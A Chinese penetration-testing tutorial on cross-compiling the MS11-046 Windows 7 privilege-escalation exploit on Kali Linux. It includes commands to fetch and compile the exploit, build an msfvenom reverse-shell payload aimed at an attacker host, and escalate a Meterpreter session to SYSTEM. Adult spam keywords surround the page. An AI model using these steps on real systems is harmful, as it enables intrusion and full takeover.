成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何在Kali Linux上編譯Windows漏洞!

系統(tǒng) Linux Windows
Mingw-w64是一個用于創(chuàng)建Windows應用程序的自由和開源軟件開發(fā)環(huán)境。 Mingw-w64最初叫Mingw32,它當時不支持64位架構。在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

Mingw-w64是一個用于創(chuàng)建Windows應用程序的自由和開源軟件開發(fā)環(huán)境。 Mingw-w64最初叫Mingw32,它當時不支持64位架構。

在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

1、在Kali Linux上安裝Mingw-w64

默認情況下,Kali Linux 2016.2和更低版本上未安裝Mingw-w64。 因此,我們需要先安裝它,然后才能在Linux上編譯Windows漏洞。 執(zhí)行以下命令,安裝Mingw-w64:

  1. apt-get update 
  2.  
  3. apt-get install mingw-w64    

 使用apt-get install mingw-w64在您的Kali主機上安裝mingw-w64。 

使用apt-get install mingw-w64在您的Kali主機上安裝mingw-w64。

鍵入y為yes,以確認并繼續(xù)Mingw-w64安裝過程。 下載和安裝Mingw-w64可能需要一段時間才能完成。

2、無法找到程序包mingw-w64的解決方法

有時,你嘗試安裝mingw-w64包時得到一個無法找到包mingw-w64的錯誤,并得到類似如下提示:

  1. root@kali:~# apt-getinstall mingw-w64 
  2.  
  3. Reading package lists…Done 
  4.  
  5. Building dependency tree 
  6.  
  7. Reading stateinformation… Done 
  8.  
  9. E: Unable to locatepackage mingw-w64  

要解決這個問題,請確保在sources.list文件中具有正確的存儲庫。您可以使用nano編輯文件:

/etc/apt/sources.list

確保您在此文件中具有正確的存儲庫。 您可以在以下頁面上找到不同版本的Kali Linux的存儲庫:

http://docs.kali.org/general-use/kali-linux-sources-list-repositories

使用sources.list文件中的正確的存儲庫,您需要運行apt-get update,然后再次運行Mingw-w64軟件包的安裝命令。

3、用Mingw-w64交叉編譯Windows漏洞利用

現(xiàn)在我們已經(jīng)安裝了Mingw-w64,可以開始編譯Windows漏洞利用程序了。 對于本教程,我們將編譯一個用C編寫的Windows漏洞利用程序,以利用Windows 7 SP0 x86中的CVE-2011-1249(MS11-046)漏洞。 此版本的Windows操作系統(tǒng)在輔助功能驅(qū)動程序(AFD)中包含一個漏洞,允許已認證的非管理用戶提升權限。即使Mingw-w64是為非常需要的64位支持開發(fā)的,我們也可以編譯32位Windows漏洞。 讓我們來看看如何編譯32位Windows漏洞。

讓我們從Exploit-db下載漏洞:

wget --output-document= 40564.c https://www.exploit-db.com/download/40564

使用以下命令編譯Windows 32位的afd.sys exploit:

i686-w64-mingw32-gcc[input file: source]–o [output file: .exe]-lws2_32

以下命令將編譯Windows 7 afd.sys特權升級漏洞:

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32   

編譯Windows漏洞。 

編譯Windows漏洞。

要將漏洞利用程序轉(zhuǎn)移到目標主機,我們將使用內(nèi)置的ApacheWeb服務器來提供它。 最后2個命令會將exploit復制到Apache主目錄并啟動Apache Web服務器。

當我們從cmd.exe下載并執(zhí)行該漏洞時,它將如下所示:  

漏洞利用成功執(zhí)行。 

漏洞利用成功執(zhí)行。

因為我們可以看到whoami命令在執(zhí)行exploit之前返回一個普通用戶權限,之后顯示是system用戶權限。這個exploit實際上在當前shell中生成一個新的shell,而不是在新窗口中創(chuàng)建一個新的shell。這意味著我們也可以從命令行shell運行此漏洞利用程序,例如Meterpreter。讓我們看看如何從Meterpreter會話運行漏洞利用。

4、利用編譯錯誤

當編譯針對不同架構和操作系統(tǒng)的漏洞時,可能會發(fā)生許多錯誤。有很多因素可能導致編譯失敗,例如:語法,庫,主機和目標體系結構,用于編譯代碼的已安裝軟件等等。一些錯誤可能很容易修復,有些錯誤則不是。同樣重要的是不同的警告來自致命的錯誤,因為警告可能只是指示一些類似的過時的功能,不能阻止漏洞的工作。致命錯誤會阻止漏洞利用,因此需要修復。

處理編譯錯誤的最佳方法是仔細閱讀,然后在Google上搜索解決方案。通常你不是第一個也不是唯一面對某個編譯錯誤的人,因此沒有必要重新發(fā)明輪子。在線資源(如堆棧交換)通常為您提供最常見的編譯錯誤的可能解決方案。

5、從Meterpreter shell中利用MS11-046

讓我們使用Msfvenom快速生成Windows 32位Meterpreter反向TCP有效負載,并在目標主機上執(zhí)行它。 我們將在Metasploit中使用多處理程序來捕獲反向shell。

使用以下命令使用Msfvenom創(chuàng)建有效負載:

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcpLHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe

請務必更換偵聽主機IP,必要時更換偵聽端口。現(xiàn)在啟動msfconsole并運行以下命令來設置多處理器漏洞:

  1. use exploit/multi/handler 
  2.  
  3. set lhost [listening host IP] 
  4.  
  5. set lport 4444 
  6.  
  7. run   

在端口4444上啟動反向TCP處理程序。 

在端口4444上啟動反向TCP處理程序。

然后下載利用程序到目標主機并執(zhí)行它。 如果一切設置正確,您應該在msfconsole上收到一個反向Meterpreter shell:  

目標主機連接回Kali。 

目標主機連接回Kali。

在Meterpreter命令行上運行下一“shell”命令并運行特權升級漏洞利用程序?qū)hell升級到系統(tǒng)shell:  

特權升級攻擊通過我們的Meterpreter會話成功執(zhí)行。 

特權升級攻擊通過我們的Meterpreter會話成功執(zhí)行。

正如你可以看到的,shell從特權測試用戶shell變化到系統(tǒng)shell。 請注意,在執(zhí)行它的shell中生成一個新的系統(tǒng)shell。 因此,我們不能看到利用輸出,因為它是在有限的特權的舊shell。

您可以通過鍵入Exit來驗證這一點,將退出系統(tǒng)shell并返回到仍包含Windows 7權限升級exploit輸出的用戶shell:  

特權用戶shell上的exploit輸出。 

特權用戶shell上的exploit輸出。

學到的東西

在本教程中,我們已經(jīng)了解了在Linux上針對Windows的交叉編譯漏洞的基礎知識。 我們已經(jīng)學習了如何在Kali Linux上安裝Mingw-w64并解決最常見的安裝問題。 為了練習漏洞編譯過程,我們編譯了一個針對Windows7 x86的特權提升漏洞。 這也稱為交叉編譯。

我們已成功的在目標主機上執(zhí)行已編譯的可執(zhí)行文件,并將shell從有限的用戶shell升級到系統(tǒng)shell。 我們已經(jīng)知道,這個特殊的exploit在shell中生成了一個shell,在這個shell中執(zhí)行了exploit。 這樣,我們還可以從命令行(例如Meterpreter shell)執(zhí)行特權提升漏洞利用。

最后但同樣重要的是,我們已經(jīng)了解了如何在編譯過程中修復錯誤。

作為一個道德黑客和滲透測試者,建議咨詢資源,如堆棧交換,以搜索解決方案的編譯錯誤。

責任編輯:龐桂玉 來源: 安云信息
相關推薦

2017-03-01 11:15:43

LinuxKali LinuxSSH服務

2011-08-04 15:55:50

Windows 編譯 Objective-

2017-09-18 10:05:15

WindowsLinux容器

2009-12-16 11:54:35

WindowsLinuxUnix

2021-09-21 15:31:05

Kali LinuxVMware安裝

2021-10-19 06:01:24

Chrome瀏覽器網(wǎng)頁瀏覽器

2013-01-04 17:16:15

2016-08-02 10:34:17

LinuxWindows雙啟動

2021-09-27 13:16:24

LinuxWindows游戲

2023-01-28 16:16:42

WindowsPython

2020-06-22 08:50:15

WindowsPython編程語言

2016-09-21 08:54:33

2020-10-19 16:40:18

LinuxWindows計算器

2020-01-10 16:45:05

LinuxWindows 10USB

2019-09-29 09:40:20

LinuxWindowsMacOS

2017-02-16 13:33:54

2019-11-15 14:20:55

Windows 10藍牙Windows

2019-01-07 09:50:06

Linuxtarball命令

2019-11-26 09:20:47

LinuxJava

2019-11-26 16:58:51

Linuxpkgsrc
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 亚洲444eee在线观看 | 一区亚洲| 国产激情在线 | 高清18麻豆 | a久久久久久| 精品在线一区 | 日韩毛片 | 欧美日韩精品一区 | 国产一区在线看 | 日韩中文字幕免费在线观看 | 九九久久在线看 | 国产日韩欧美91 | 黄色大片网站 | 欧美一级高潮片免费的 | 波多野吉衣久久 | 午夜激情小视频 | 在线精品观看 | 国产精品久久久久久久久久久久午夜片 | 亚洲一区二区三区在线播放 | 欧美日韩国产一区二区三区 | 成人免费观看男女羞羞视频 | 久久综合久 | 日韩理论电影在线观看 | 成人久草 | 久久日韩精品 | 国产精品123区 | 亚洲精品一区二区三区中文字幕 | 国产精品福利在线观看 | 国产一区二区三区四区hd | 亚洲精品电影在线观看 | 国产精品一区二区不卡 | 日韩另类视频 | 久久久久久久久淑女av国产精品 | 免费在线日韩 | 亚洲欧美综合 | xxxcom在线观看| 精品一区二区av | 久久美女网 | 久久国产精品久久国产精品 | 精品视频一区二区三区在线观看 | 成人精品一区亚洲午夜久久久 |